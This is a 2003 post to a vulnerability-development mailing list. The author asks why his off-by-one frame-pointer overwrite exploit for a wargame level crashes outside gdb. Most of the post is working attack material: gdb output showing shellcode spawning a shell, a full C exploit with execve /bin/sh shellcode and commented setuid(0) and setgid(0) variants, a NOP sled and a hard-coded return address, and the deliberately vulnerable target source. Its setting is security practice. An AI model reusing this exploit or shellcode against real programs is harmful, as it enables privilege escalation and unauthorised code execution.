Vulnerability Development mailing list archives
Fake frame overwriting
From: joe <moj0e () terra com br>
Date: Tue, 30 Sep 2003 20:21:13 -0300
Earlier I posted a problem I was having with executing code by overwriting EBP. I almost have it working... Its just one peculiar problem that I am dealing with.
Let me post the gdb output and you it might be clear to you. [joe@localhostpital wargame]$ gdb ./bof15 core.15254 GNU gdb 5.3-22mdk (Mandrake Linux) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you arewelcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details.This GDB was configured as "i586-mandrake-linux-gnu"...(no debugging symbols found)...
Core was generated by `./bof15 '. Program terminated with signal 4, Illegal instruction.Reading symbols from /lib/i686/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x40155f50 in sys_sigabbrev () from /lib/i686/libc.so.6
(gdb) break *0xbffff880
Breakpoint 1 at 0xbffff880
(gdb) x 0xbffff880
0xbffff880: 0x90909090
(gdb) run $VULN
########################
# W4rCr0-21 - LEVEL XV #
########################
- Yeah, right!!!
(no debugging symbols found)...
Breakpoint 1, 0xbffff880 in ?? ()
(gdb) x 0xbffff880
0xbffff880: 0x90909090
(gdb) x/100 0xbffff880
0xbffff880: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff890: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8a0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8d0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8e0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff900: 0x90909090 0x90909090 0x46b0c029 0x0cb3db29
0xbffff910: 0x890ceb80 0xeb80cdd9 0xc0295e18 0x89074688
0xbffff920: 0x76890c46 0x870bb008 0x084b8df3 0xcd0c538d
0xbffff930: 0xffe3e880 0x622fffff 0x732f6e69 0xfff88068
0xbffff940: 0xfff880bf 0xfff880bf 0xfff880bf 0x787878bf
0xbffff950: 0x78787878 0x4c007878 0x4b535345 0x2f3d5945
0xbffff960: 0x2f637465 0x73656c2e 0x434c0073 0x5041505f
0xbffff970: 0x703d5245 0x52425f74 0x5f434c00 0x52444441
0xbffff980: 0x3d535345 0x425f7470 0x434c0052 0x4e4f4d5f
0xbffff990: 0x52415445 0x74703d59 0x0052425f 0x54534f48
0xbffff9a0: 0x454d414e 0x636f6c3d 0x6f686c61 0x69707473
0xbffff9b0: 0x006c6174 0x4d524554 0x6574783d 0x53006d72
0xbffff9c0: 0x4c4c4548 0x69622f3d 0x61622f6e 0x48006873
0xbffff9d0: 0x53545349 0x3d455a49 0x30303031 0x414d5700
0xbffff9e0: 0x5f52454b 0x5f4e4942 0x454d414e 0x2d746c3d
0xbffff9f0: 0x6b616d77 0x4c007265 0x554e5f43 0x4952454d
0xbffffa00: 0x74703d43 0x0052425f 0x52455355 0x656f6a3d
(gdb) c
Continuing.
Die: DW_TAG_formal_parameter (abbrev = 41, offset = 11608)
has children: FALSE
attributes:
DW_AT_name (DW_FORM_string) string: "sym"
DW_AT_decl_file (DW_FORM_data1) constant: 33
DW_AT_decl_line (DW_FORM_data2) constant: 365
DW_AT_type (DW_FORM_ref4) constant: 9043
Dwarf Error: Cannot find type of die.
(gdb) c
Continuing.
sh-2.05b$ exit
exit
Program exited normally.
(gdb)
As you can see, It actually executes my shellcode (running sh-2.05b).
However, It seems to die first.... When I run it out side of gdb, It
causes an Illegal instruction.
Thanx for all your help! j0e
#include <stdio.h>
#include <unistd.h>
char sc_linux[] =
///home/joe/code/wargames/dome
"\x29\xc0\xb0\x46\x29\xdb"
"\xb3\x0c\x80\xeb\x0c\x89"
"\xd9\xcd\x80\xeb\x18\x5e"
"\x29\xc0\x88\x46\x07\x89"
"\x46\x0c\x89\x76\x08\xb0"
"\x0b\x87\xf3\x8d\x4b\x08"
"\x8d\x53\x0c\xcd\x80\xe8"
"\xe3\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68";
/*
"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
"\xff\xff\x01\x2f\x68\x6f\x6d\x65\x2f\x6a\x6f\x65"
"\x2f\x63\x6f\x64\x65\x2f\x77\x61\x72\x67\x61\x6d"
"\x65\x2f\x64\x6f\x6d\x65\x01";
*/
// "\x31\xdb" /* xor %ebx,%ebx */
// "\x89\xd8" /* mov %ebx,%eax */
//"\xb0\x17" /* mov $0x17,%al */
// "\xcd\x80" /* int $0x80 */
/* setuid(0); */
// "\x31\xdb" /* xor %ebx,%ebx */
// "\x89\xd8" /* mov %ebx,%eax */
// "\xb0\x17" /* mov $0x17,%al */
// "\xcd\x80" /* int $0x80 */
/* setgid(0); */
// "\x31\xdb" /* xor %ebx,%ebx */
// "\x89\xd8" /* mov %ebx,%eax */
// "\xb0\x2e" /* mov $0x2e,%al */
// "\xcd\x80" /* int $0x80 */
/* /bin/sh execve(); */
// "\x31\xc0" /* xor %eax,%eax */
// "\x50" /* push %eax */
// "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
// "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
// "\x89\xe3" /* mov %esp,%ebx */
// "\x50" /* push %eax */
// "\x53" /* push %ebx */
// "\x89\xe1" /* mov %esp,%ecx */
// "\x31\xd2" /* xor %edx,%edx */
// "\xb0\x0b" /* mov $0xb,%al */
// "\xcd\x80"
// "\x90\x90" /* int $0x80 */
// "\x90\x90";
/* exit(0); */
// "\x31\xdb" /* xor %ebx,%ebx */
//"\x89\xd8" /* mov %ebx,%eax */
// "\xb0\x01" /* mov $0x01,%al */
//"\xcd\x80"; /* int $0x80 */
/*Original shell code....
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
*/
main()
{
int i, j, t;
char buffer[1024];
bzero(&buffer, 1024);
for (i=0;i<=(252-sizeof(sc_linux)-20);i++)
{
buffer[i] = 0x90;
}
for (j=0,i=i;j<(sizeof(sc_linux)-1);i++,j++)
{
buffer[i] = sc_linux[j];
}
for(t=0; t < 4;t++ ){
buffer[i++] = 0x80; //10 0x80498cc
buffer[i++] = 0xf8; // Address of our buffer f6
buffer[i++] = 0xff; // ff
buffer[i++] = 0xbf; //bf
}
for(t=0; t < 9; t++) {
buffer[i++] = 0x78; // overflowchar
}
setenv("VULN",buffer,1);
system("bash");
}
Attachment:
bof15
Description:
/*
W4rCr0-21 - LEVEL XV coded by DownBload
TIP: One byte to rule them all??? (deja-vu???:)))
*/
#include <stdio.h>
void do_me (char *tralala)
{
char name[256];
int x;
for (x=0;x<=256;x++)
name[x] = tralala[x];
}
main (int argc, char **argv)
{
system ("/usr/bin/clear");
printf ("########################\n");
printf ("# W4rCr0-21 - LEVEL XV #\n");
printf ("########################\n");
printf ("- Yeah, right!!!\n\n");
if (argc == 1) {
printf ("> Are you a real hacker????\n");
exit(0);
}
do_me(argv[1]);
printf ("> No, you are not a real hacker, you are hidiot :)))");
}
Current thread:
- Fake frame overwriting joe (Oct 01)
- <Possible follow-ups>
- Re: Fake frame overwriting joe (Oct 01)